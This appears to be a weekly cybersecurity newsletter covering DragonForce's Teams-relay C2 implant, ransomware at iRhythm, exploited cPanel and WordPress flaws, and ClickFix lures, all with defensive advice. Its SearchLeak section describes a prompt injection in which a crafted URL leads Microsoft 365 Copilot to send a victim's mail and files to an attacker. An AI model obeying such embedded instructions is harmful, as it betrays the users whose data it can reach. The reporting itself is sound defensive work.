This Week in Cybersecurity
Issue 23 lands on a week defined by attackers bending legitimate enterprise infrastructure against itself — from Microsoft's own relay network carrying ransomware commands to Microsoft 365 Copilot being turned into a one-click data exfiltration engine. Meanwhile, healthcare continues to bleed in 2026: iRhythm Technologies confirmed that cardiac patient data was stolen and a ransom demand issued. And CISA has flagged its third cPanel-related exploited vulnerability in as many months, signaling a sustained campaign against web hosting infrastructure.
The most technically striking story this week is DragonForce's Backdoor.Turn implant, which tunnels command-and-control traffic through Microsoft Teams relay servers. Corporate firewalls almost universally allow outbound connections to Teams relay endpoints — it is a prerequisite for the product to function. DragonForce exploits precisely this trust: their implant blends into the noise of legitimate Teams traffic, allowing operators to maintain persistent access without triggering IP reputation alerts, anomalous destination flags, or DLP rules. The only realistic detection path is behavioral: non-Teams processes connecting to Teams relay infrastructure, or abnormal volumes of relay traffic from specific workstations.
The SearchLeak vulnerability chain in Microsoft 365 Copilot Enterprise is the week's most urgent patch story for enterprise Microsoft shops. Researchers disclosed a chained exploit that allows an attacker to exfiltrate emails, OneDrive files, and SharePoint content with a single crafted URL click. Copilot's own authorized data access channels carry the stolen data out — bypassing DLP controls that look for unusual outbound flows. The attack is effectively prompt injection at scale, weaponizing the AI's broad data access against the victim. Microsoft is investigating; audit Copilot access and enable Purview audit logging now.
The ClickFix social engineering wave continues to accelerate. This week, the "Lorem Ipsum" malware campaign — potentially linked to Vice Society — adopted ClickFix delivery through compromised WordPress sites. ClickFix is effective because it delegates the malicious action to the victim: no drive-by exploit, no vulnerability required, just a convincing fake error dialog and a PowerShell command pasted into the Run dialog. User awareness training must address this specific technique by name.
On the regulatory front, the FTC's report showing $3.5 billion in imposter scam losses in 2025 and the UK's proposed mandatory ID verification for social media account creation both point to growing government pressure on platforms to take identity fraud seriously. The direction of travel is clear even if the implementation details remain contested.
Top Stories
DragonForce Ransomware Hides C2 Traffic Inside Microsoft Teams Relays
DragonForce operators deployed a custom implant called Backdoor.Turn that tunnels command-and-control communications through Microsoft Teams relay infrastructure. The implant crafts traffic conforming to Teams' WebSocket-based relay protocol, causing outbound C2 connections to terminate at legitimate Microsoft relay servers — endpoints that corporate firewalls routinely allow. With no suspicious destination IPs and payload encrypted over standard HTTPS/WSS, network-based detection is largely blind to the activity.
The operational advantage is significant. By piggybacking on infrastructure that enterprises cannot practically block, DragonForce can maintain persistent access through firewall rules that would flag any custom C2 domain. Dwell time extends, allowing attackers to map the environment and stage the ransomware deployment before defenders know the initial access occurred.
Detection requires endpoint-layer visibility: monitor for non-Teams binaries (not teams.exe or msedgewebview2.exe) making WebSocket connections to *.relay.teams.microsoft.com. Zero Trust network policies that restrict which hosts can initiate outbound Teams relay connections will limit the implant's reach even in environments where blocking the relay endpoints entirely is not feasible.
SearchLeak: Microsoft 365 Copilot Turned into One-Click Data Theft Tool
Security researchers disclosed SearchLeak, a chained exploit targeting Microsoft 365 Copilot Enterprise that allows attackers to silently exfiltrate mailbox data, OneDrive files, and SharePoint content — triggered by a single victim URL click. The attack is a form of prompt injection: a specially crafted URL embeds attacker-controlled instructions that Copilot's model interprets as legitimate user requests, causing Copilot to query the victim's own data and send it to an attacker-controlled endpoint using Copilot's own authorized API access.
Traditional security controls are largely blind to this attack. No malware is installed, so antivirus and EDR are not triggered. Data moves via Copilot's own authorized channels rather than anomalous outbound connections, so DLP tools may not flag it. The URL itself may carry no known malicious indicators, bypassing email filtering. And MFA does not protect against attacks that execute within an already-authenticated session.
Microsoft is investigating. Until a patch is available, organizations should review which users have Copilot Enterprise enabled, enable Copilot interaction logging via Microsoft Purview audit logging, and apply Conditional Access policies restricting Copilot to compliant, managed devices. SearchLeak is an early signal of the structural risk that comes with granting broad enterprise data access to AI systems that can be influenced by attacker-controlled content.
iRhythm Confirms Patient Data Stolen in Ransomware Attack
iRhythm Technologies — maker of the Zio cardiac monitoring patch — confirmed that attackers exfiltrated data from its systems in an intrusion discovered June 8, 2026. The threat actors issued a ransom demand threatening to publish stolen data, the classic double-extortion playbook. iRhythm's systems contain cardiac monitoring data (continuous ECG recordings), patient health information protected under HIPAA, and billing and insurance records — among the most sensitive and least-changeable categories of personal data.
The HIPAA breach notification clock is now running: affected individuals must be notified within 60 days of iRhythm determining the scope of the breach. Healthcare technology companies remain among the most heavily targeted organizations in 2026 for exactly the structural reasons that make iRhythm an attractive target: urgency of operations creates pressure to pay, regulatory consequences create additional leverage, and patient health data commands premium prices on criminal markets.
Patients who have used iRhythm monitoring services should monitor for phishing attempts using personalized health details, watch explanations-of-benefits from insurers for services they did not receive, and await formal HIPAA notification letters from the company.
CISA Issues 3-Day Emergency Patch for Third Exploited cPanel Flaw of 2026
CISA added CVE-2026-54420 — an actively exploited authentication bypass in the LiteSpeed cPanel user-end plugin — to its Known Exploited Vulnerabilities catalog with a three-day federal remediation deadline. The tight window signals confirmed ongoing exploitation. This is at minimum the third cPanel-related exploited vulnerability in 2026, following CVE-2026-48172 (LiteSpeed root command execution, May 2026) and CVE-2026-41940 (WHM authentication bypass, May 2026), suggesting threat actors have developed dedicated tooling targeting the cPanel ecosystem.
The risk profile for cPanel vulnerabilities is amplified by multi-tenancy: a single compromised cPanel instance can expose dozens or hundreds of hosted websites simultaneously. Internet scanners identify cPanel deployments within hours of a disclosure, making rapid mass exploitation feasible.
Hosting providers and administrators running the LiteSpeed cPanel plugin should apply available patches immediately or disable the plugin if patching cannot be completed within 72 hours. Review server logs for anomalous script executions, new cron jobs, or unexpected outbound connections from web server processes. Website owners on shared hosting should confirm their provider's patch status.
'Lorem Ipsum' Malware Pivots to ClickFix Delivery via Compromised WordPress Sites
The "Lorem Ipsum" malware campaign — infrastructure linked tentatively to Vice Society ransomware — has adopted ClickFix as its primary delivery mechanism, injecting fake error overlays into compromised WordPress sites. The ClickFix technique prompts victims to open the Windows Run dialog and paste a PowerShell command, which downloads and executes the malware payload. No browser exploit is required: the social engineering itself is the attack.
ClickFix's effectiveness rests on hijacking familiar user behaviors. Opening the Run dialog and pasting a command is something technically proficient users do legitimately — the lure is designed to make the action feel routine. The use of compromised WordPress sites as delivery infrastructure extends reach while borrowing trust from legitimate domain reputations that web filtering is less likely to block.
Organizations should deploy PowerShell execution controls (Constrained Language Mode, AppLocker, or WDAC), restrict Run dialog access via Group Policy in managed environments, and include ClickFix in user security awareness training — explicitly teaching staff that no legitimate website will ask them to manually paste commands to fix an error.
Security Corner
10 CVEs are newly published in the Security Advisories section this week. Key advisories to prioritize:
CVE-2026-6933 — Unauthenticated RCE in Premmerce Dev Tools WordPress Plugin (CVSS 8.8)
Versions up to and including 2.0 of the Premmerce Dev Tools plugin expose a generatePluginHandler function that writes attacker-supplied PHP content to disk without any authorization check. An unauthenticated attacker sends a crafted POST request, the plugin writes a PHP web shell to the filesystem, and a follow-up GET request executes it. Full server compromise in two requests. Update or deactivate immediately; audit the WordPress plugin directory for unexpected .php files.
Full advisory →
CVE-2026-39574 — Critical SQL Injection in InPost Gallery WordPress Plugin (CVSS 9.3)
An unauthenticated SQL injection flaw in the InPost Gallery plugin (versions ≤ 2.1.4.6) allows attackers to extract or manipulate database contents with no credentials required. At CVSS 9.3 Critical, this warrants immediate update. Audit gallery query parameters and review database logs for anomalous UNION SELECT or SLEEP() patterns if the plugin was recently installed in its vulnerable version range.
Full advisory →
Also published this week:
- CVE-2026-27053 → Advisory →
- CVE-2026-9862 → Advisory →
- CVE-2016-20066 → Advisory →
- CVE-2026-8935 → Advisory →
- CVE-2026-20262 — Cisco Catalyst SD-WAN Manager Path Traversal → Advisory →
- CVE-2026-12204 → Advisory →
- CVE-2026-54420 — LiteSpeed cPanel Plugin (CISA KEV) → Advisory →
- CVE-2026-9648 → Advisory →
Quick Takes
-
FTC: $3.5 Billion Lost to Imposter Scams in 2025 — The FTC's 2025 Consumer Sentinel Network report tallied $3.5 billion in losses to imposter scams — fraudsters posing as government agencies, tech support firms, banks, and utility companies. The number represents a record high and reflects the acceleration of AI-powered voice cloning and personalized phishing that makes impersonation attacks harder to detect. Read more →
-
UK to Require ID or Face Scan Before Creating Social Media Accounts — The UK government announced a proposal requiring age and identity verification before users can create social media accounts. Platforms would need to verify real identity via government ID upload or biometric face scan. The proposal has drawn pushback from privacy advocates concerned about centralized identity databases and chilling effects on anonymous speech. Read more →
-
Fake Microsoft Alerts Deploy North Korean NarwhalRAT — North Korean threat actors distributed fake Microsoft security alert emails directing targets to download "Microsoft Security Update" installers that deployed NarwhalRAT, a remote access trojan with keylogging, file exfiltration, and screen capture capabilities. The campaign targets individuals at organizations with geopolitical significance to the DPRK. Verify all Microsoft security update prompts through official channels — Microsoft does not deliver security patches via emailed download links. Read more →
-
Chinese Hackers Breach REDCap Servers, Steal Medical Research — A China-linked threat group compromised REDCap (Research Electronic Data Capture) servers at academic and research institutions, stealing clinical trial data and sensitive medical research. REDCap is widely used across universities and hospitals for clinical research data management. Institutions running REDCap should audit for unauthorized access, review REDCap version patches, and confirm network access controls limiting REDCap to authorized internal and VPN-authenticated users. Read more →
-
FBI and Google Dismantle 'Outsider Enterprise' Phishing-as-a-Service — A joint FBI and Google operation dismantled Outsider Enterprise, a phishing-as-a-service platform that provided ready-made phishing kits, victim management dashboards, and infrastructure to criminal customers. The takedown removes a significant capability tier that lowered the technical barrier for conducting credential-phishing campaigns at scale. Read more →
-
Council of Europe Investigates ShinyHunters Data Breach Claims — The Council of Europe is investigating claims by the ShinyHunters threat group that the organization's data was compromised. ShinyHunters is a prolific data theft actor responsible for dozens of high-profile breaches across cloud-hosted databases. The investigation status and scope of any potential breach are not yet confirmed publicly. Read more →
-
Infinite Campus Breach Affects 137,000 School Staff Accounts — A breach of Infinite Campus — a student information system used across thousands of U.S. school districts — exposed account credentials for approximately 137,000 school staff members. Affected staff should rotate passwords immediately and enable multi-factor authentication. School administrators should audit for unauthorized access to student records and verify data access logs for anomalous queries. Read more →
-
Cyberattack on Russian Tech Firm Astral Disrupts Government Services — A cyberattack on Astral, a Russian enterprise software and electronic document management firm serving government clients, disrupted business and government services. The attack continues a pattern of hacktivist and state-aligned operations targeting Russian IT infrastructure, with cascading disruption to government agencies that rely on Astral's platforms. Read more →
Upcoming
-
SearchLeak Patch Watch: Microsoft is investigating the SearchLeak Copilot vulnerability chain. No patch has been issued as of June 17. Microsoft 365 Copilot Enterprise administrators should monitor the Microsoft Security Response Center (MSRC) blog daily and be prepared to expand Copilot access restrictions if exploitation in the wild is confirmed before a fix ships.
-
iRhythm HIPAA Notification Countdown: With the breach discovered June 8, iRhythm has until approximately August 7, 2026 to notify affected individuals under the HIPAA 60-day clock. Scope determination is likely still in progress. Watch for iRhythm breach notification filings with the HHS Office for Civil Rights breach portal for the first public indication of the number of individuals affected.
-
cPanel Exploitation Escalation: Three exploited cPanel plugin vulnerabilities in under two months indicates sustained attacker tooling development against the cPanel ecosystem. A fourth vulnerability in the same ecosystem within the next 30–60 days should be assumed as a planning risk. Hosting providers should evaluate whether the LiteSpeed plugin is a required dependency or can be permanently removed to reduce attack surface.
-
DragonForce Teams C2 — Detection Capability Gap: Most enterprise security teams lack detection rules for non-Teams processes connecting to Teams relay endpoints. The week ahead is the right time to build those detections. SIEM and EDR teams should implement behavioral rules before DragonForce or copycat actors normalize the technique further across affiliates.
-
UK ID Verification Legislation Timeline: The UK social media identity verification proposal is in early consultation. The timeline for legislative introduction, passage, and platform implementation is months to years away — but the policy direction signals where regulatory pressure on anonymous internet identity is heading across multiple jurisdictions. Watch for consultation response deadlines for platform and civil society comment windows.
By the Numbers
| Metric | Value |
|---|---|
| FTC imposter scam losses in 2025 | $3.5 billion |
| iRhythm breach — days since discovery | 9 (as of June 17) |
| Exploited cPanel plugin CVEs in 2026 | 3 |
| Infinite Campus breach — accounts exposed | 137,000 school staff |
| SearchLeak — user interactions required to exfiltrate M365 data | 1 (single URL click) |
| CVE-2026-6933 Premmerce Dev Tools — CVSS score | 8.8 (High) |
| CVE-2026-39574 InPost Gallery — CVSS score | 9.3 (Critical) |
| New CVEs published this week | 10 |
CosmicBytez Labs — IT & Cybersecurity Intelligence Hub